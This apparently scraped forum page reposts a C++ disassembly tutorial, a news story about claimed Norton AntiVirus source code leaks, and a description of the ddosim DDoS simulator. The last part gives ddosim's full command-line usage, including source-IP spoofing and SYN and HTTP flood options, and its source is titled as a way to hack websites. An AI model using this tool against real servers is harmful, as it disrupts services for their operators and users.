I really didn’t realise how incredibly important this was until I had the pleasure of meeting a guy called Andy Yelland. If you already know Andy, then you will know exactly what I mean, but for those of you who have not met him, I will explain. Andy is one of those people who changes your perspective. He is more or less the polar opposite of the stereotypical ninja-level video game programmer: well dressed, professional, endlessly well-informed, friendly, funny, and socially adept. However, the most amazing thing about Andy is the speed with which he can dissect a console core dump. He just sits there and calmly unpicks the stack, occasionally keeping a few notes about which register some value is in, or looking up the address of a function in a symbol file as he goes, and then in somewhere between five minutes and a few hours (depending on how tricky the issue is) he’ll turn around and tell you exactly what the problem was. Not only that, but he’ll happily do this in a codebase he’s never even seen before – and even better, he’s totally happy to sit and explain it all to you as he does it.

After sitting with Andy through a few dissections I realised that whilst what he does seems like black magic, it is in fact anything but. It’s about having an expert understanding of how C++ works at the assembly level, and bloody-mindedly applying that knowledge to reverse engineer the state of the system backwards from the current stack state (i.e.
when the crash happened) to the point where the bad data was introduced. Clearly this takes a lot of practice, and to get anywhere near as good as Andy at it would take anyone (who isn’t Rain Man) years of their life.

I’m not saying that I think everyone should be able to casually decipher disassembly representing code they didn’t write – I certainly can’t do that. What I am saying is that I think all game programmers should be able to look at disassembly and at least make an educated guess at what is going on; by leveraging their understanding of how C++ is implemented at the low level – and given time, possibly with some hardware manuals – they should be able to work it out.

The first rule of the Low Level Curriculum for C++: Don’t fear Disassembly

OK, so assuming that you agree with me, where do you start? I think the best way to start making sense of it is to look at some simple code in the disassembly window, so let’s do that. Make yourself a test project in a C++ programming IDE of your choice and write some simple code in your main() function. For the sake of argument, let’s say you’re using my weapon of choice – Visual Studio 2010 on a Windows PC. The code I’m suggesting we look at is this:

int x = 1;
int y = 2;
int z = 0;

z = x + y;

Make sure you’re in the “debug” configuration, put a breakpoint on the line z = x + y; and then run the program. When the breakpoint gets hit, right-click in the text editor and choose “Go To Disassembly” from the context menu.

DON’T PANIC!

NOTE: ensure that you have the same options checked in the right-click context menu! You should now see something that looks like the image above. Your text will almost certainly be scrolled differently, because I’ve messed about with the window sizes and text position for clarity.
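If you’d rather paste something that compiles straight away, here is the same snippet wrapped in a function (the name addExample is mine, purely for illustration – in the post the code lives directly in main(), so your exact ebp offsets may differ):

```cpp
// The example from the post, wrapped in a function so it builds as-is.
// Put the breakpoint on the z = x + y line and choose "Go To Disassembly".
int addExample() {
    int x = 1;
    int y = 2;
    int z = 0;

    z = x + y;

    return z;
}
```

Call it from your main() and step into it; the disassembly you see should be essentially the same shape as the listing discussed below.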
The black text with line numbers is clearly the code we compiled; the grey text below each line of code shows the assembler that each line of code generated. So what does it all mean?

The hexadecimal number at the start of each line of assembler is the memory address of that line of assembler – remember, code is really just a stream of data that tells the CPU what to do, so logically it must be at an address in memory. Don’t worry about these too much; I just wanted to make the point that the instructions are in memory too.

mov and add are assembler mnemonics – each represents a CPU instruction, one per line with its arguments.

eax and ebp are two of the registers in the x86 CPU architecture. Registers are “working area” for CPUs: fragments of memory that are built into the CPU itself, and which the CPU can access instantaneously. Rather than having addresses like memory, registers are named in assembler, because there are usually only a (relatively) small number of them. The eax register is a “general purpose” register, but is primarily used for mathematical operations. The ebp register is the “base pointer” register; in x86 assembler, local variables will typically be accessed via an offset from this register. We will cover the purpose of ebp in later posts.

As I alluded to in the previous sentence, ebp-8, ebp-14h, and ebp-20h are the memory addresses (as offsets from the ebp register) storing the values of the local variables x, y, and z respectively.

dword ptr [ ... ] means “the 32 bit value stored in the address in the square brackets” (this is definitely true for the Win32 assembler, it may be different for the Win64 one – I’ve not checked).

How does it work?

Now, we know that the assembler generated by the C++ code we’ve written will initialise the three variables x, y, and z, then add x to y and store the result in z. Let’s look at each line of assembler in isolation (ignoring the address).
mov dword ptr [ebp-8],1

This assembler instruction sets the value of the variable x by moving the value 1 into the memory at address ebp-8.

mov dword ptr [ebp-14h],2

This assembler instruction sets the value of the variable y by moving the value 2 into the memory at address ebp-14h – n.b. the ‘h’ is necessary because 14 in decimal is a different value from 14 in hexadecimal; this wasn’t necessary when specifying the offset for the value of x, because 8 is the same value in decimal and hexadecimal.

mov dword ptr [ebp-20h],0

This instruction is, unsurprisingly, setting the value of the variable z. Now we’re up to the interesting part: doing the arithmetic and assigning the result to z.

mov eax, dword ptr [ebp-8]

This instruction moves the value of the memory at address ebp-8 (i.e. x) into the eax register…

add eax, dword ptr [ebp-14h]

…this instruction adds the value of the memory at address ebp-14h (i.e. y) to the eax register…

mov dword ptr [ebp-20h],eax

…and this instruction moves the value from eax into the memory at address ebp-20h (i.e. z).

So, as you can see, whilst the assembler looks very different, it is logically isomorphic with the C++ code it was generated from (i.e. whilst its behaviour may be slightly different, it will give the same output for any given input).

Hold on, why did we look at that again?

Those of you with brains connected to your eyes will have noticed that the intro to disassembly I just gave was – to use a British colloquialism – “a bit noddy”. In all honesty, that was the whole point of choosing such a simple example: the intention was to show how something as simple as adding two integers and storing the result in a third in C++ maps to assembler. You can use this exact technique to look at the vast majority of C++ language constructs and see what they actually generate, and the purpose of this was to show you that it’s simple enough to do.
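To tie the six instructions together, here is a C++ sketch of the same dance (the names stack, eax, and addLikeTheDisassembly are my own inventions): an array stands in for the memory around ebp, and a plain variable stands in for the eax register. The offsets 8, 14h, and 20h from the listing become 32-bit slot indices 2, 5, and 8:

```cpp
#include <cstdint>

// Mirror the six-instruction walkthrough above using an array as the
// pretend stack frame and a variable as the pretend eax register.
std::int32_t addLikeTheDisassembly() {
    std::int32_t stack[16] = {};  // pretend memory below ebp
    std::int32_t eax = 0;         // pretend register

    stack[2] = 1;                 // mov dword ptr [ebp-8],1    (x)
    stack[5] = 2;                 // mov dword ptr [ebp-14h],2  (y)
    stack[8] = 0;                 // mov dword ptr [ebp-20h],0  (z)

    eax = stack[2];               // mov eax, dword ptr [ebp-8]
    eax += stack[5];              // add eax, dword ptr [ebp-14h]
    stack[8] = eax;               // mov dword ptr [ebp-20h],eax

    return stack[8];              // z is now 3
}
```

It returns 3, just as z ends up holding 3 in the real program – the point being that each assembler instruction is nothing more exotic than a read or write of a slot of memory or the register.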
Obviously this example showed only two of the x86 assembler mnemonics, of which there are many more. If you want to make sense of assembler code that uses mnemonics you don’t know, it’s usually as simple as googling them. That’s all I’ve ever done, and there is so much information about x86 assembler floating about on the interweb that you should have little trouble deciphering it.

I found a super helpful webpage that covers the x86 registers in some detail: The Art of Picking Intel Registers

Here’s a link to a page to download a .pdf x86 “cheat sheet”: Intel Assembler CodeTable 80x86 - Overview of instructions (Cheat Sheet)

And the obvious wikipedia page: http://en.wikipedia.org/wiki/X86_instruction_listings

And a beefy link also linked from wikipedia: http://home.comcast.net/~fbui/intel.html

Summary

Whilst very few programmers will ever need to write assembler, all game programmers will – sooner or later – find it to their advantage to be able to read and make some sense of it. It’s amazing what you can figure out with only a partial knowledge of assembler and how it maps to C++ code. The example code we looked at was, as I’ve already admitted, very simple. The point of this first post wasn’t to give you answers, but to show that the disassembly window is only daunting if you let it be, and to encourage you to explore what your compiler is doing with the code you give it. Don’t give up just because you don’t understand what you’re seeing yet; google it, or post a specific question somewhere like Stack Overflow.

Epilogue

There are a few other things that I think are there to take away from this tiny snippet of disassembly:

the C++ concept of a variable (or any other language’s concept of a variable, for that matter) doesn’t exist at the assembler level.
In assembler, the values of x, y, and z are stored at specific memory addresses, and the CPU gets at them by explicit use of those addresses. The high level language concept of a variable, whilst easier to think about, is really an abstraction identifying a value at a memory address.

note that in order to do anything “interesting” (e.g. add a value to another) the CPU needs to have at least part of the data it is operating on in a register (I’m sure some CPUs must be able to operate directly on memory, but it’s certainly not the usual way of doing things).

Finally, I feel that this extremely simple example illustrates what I think is one of the most important facts about programming: high level languages exist only to make life easy for humans; they’re not any kind of accurate reflection of how CPUs actually work – in fact, even assembler is a human convenience compared to the actual binary opcodes that the mnemonics (e.g. mov, add, etc.) represent. My advice is: don’t think about the actual opcodes too much, and definitely don’t worry about the electrons or the silicon.

Sursa: A Low Level Curriculum for C and C++
-
[h=1]Norton AntiVirus source code leaked to hackers?[/h]

Story updated; please see below.

By Suzanne Choney

A group of Indian hackers says it has obtained the source code for Norton AntiVirus software, as well as “confidential documentation,” which it will share on websites for all to see. The group, which calls itself “The Lords of Dharmaraja,” said it plans to publish the information on several different websites, “since we experience extreme pressure and censorship from US and India government agencies.” It shared some of the information – some of which appears several years old – and a statement on the PasteBin file-sharing site. The original post was deleted, but a version is available via Google’s cache of it.

A cached version of the group’s statement about Norton AntiVirus source code and documentation.

If the hackers really do have Symantec’s source code – which at the moment remains only a claim – and release it to the world, the impact could be devastating to both the firm and to millions of users. Virus writers armed with source code would have a much easier time writing malicious programs that would evade Norton’s protection.

Symantec, which owns Norton, said in a statement to msnbc.com that it is “investigating claims of our source code being disclosed externally.” “The first claim pertained to Norton Antivirus code; however, our investigation confirmed it was a document from 12 years ago saying how the solution worked,” Symantec said in the statement. “No source code was disclosed. As for the second claim of additional code, we are still analyzing the information.” The company’s “first priority is to make sure that any customer information remains protected,” and so far, Symantec said, “we have not detected any inordinate or suspicious rates of traffic or activity going in or out of our networks.”

Updated, 9 p.m.
PT: Symantec says that "a segment" of the source code used in two of its "older enterprise products has been accessed, one of which has been discontinued. The code involved is four and five years old. This does not affect Symantec’s Norton products for our consumer customers." The company says its network "was not breached, but rather that of a third party entity. We are still gathering information on the details and are not in a position to provide specifics on the third party involved. Presently, we have no indication that the code disclosure impacts the functionality or security of Symantec’s solutions. Furthermore, there are no indications that customer information has been impacted or exposed at this time." Msnbc.com's Bob Sullivan contributed to this report. Sursa: Technolog - Norton AntiVirus source code leaked to hackers?
-
ddosim v0.2 (Application Layer DDOS Simulator) Jan 13, 2012

DDOSIM simulates several zombie hosts (having random IP addresses) which create full TCP connections to the target server. After completing the connection, DDOSIM starts the conversation with the listening application (e.g. an HTTP server). It can be used only in a laboratory environment, to test the capacity of the target server to handle application-specific DDOS attacks.

Features

HTTP DDoS with valid requests
HTTP DDoS with invalid requests (similar to a DC++ attack)
SMTP DDoS
TCP connection flood on random port

In order to simulate such an attack in a lab environment we need to set up a network like this:

On the victim machine ddosim creates full TCP connections – which are only simulated connections on the attacker side. There are a lot of options that make the tool quite flexible:

Usage: ./ddosim
-d IP           Target IP address
-p PORT         Target port
[-k NET]        Source IP from class C network (ex. 10.4.4.0)
[-i IFNAME]     Output interface name
[-c COUNT]      Number of connections to establish
[-w DELAY]      Delay (in milliseconds) between SYN packets
[-r TYPE]       Request to send after TCP 3-way handshake. TYPE can be HTTP_VALID or HTTP_INVALID or SMTP_EHLO
[-t NRTHREADS]  Number of threads to use when sending packets (default 1)
[-n]            Do not spoof source address (use local address)
[-v]            Verbose mode (slower)
[-h]            Print this help message

Source: hack websites by using ddosim v0.2 (Application Layer DDOS Simulator) Sursa: Computer Security Blog | Learning The Offensive Security: ddosim v0.2 (Application Layer DDOS Simulator)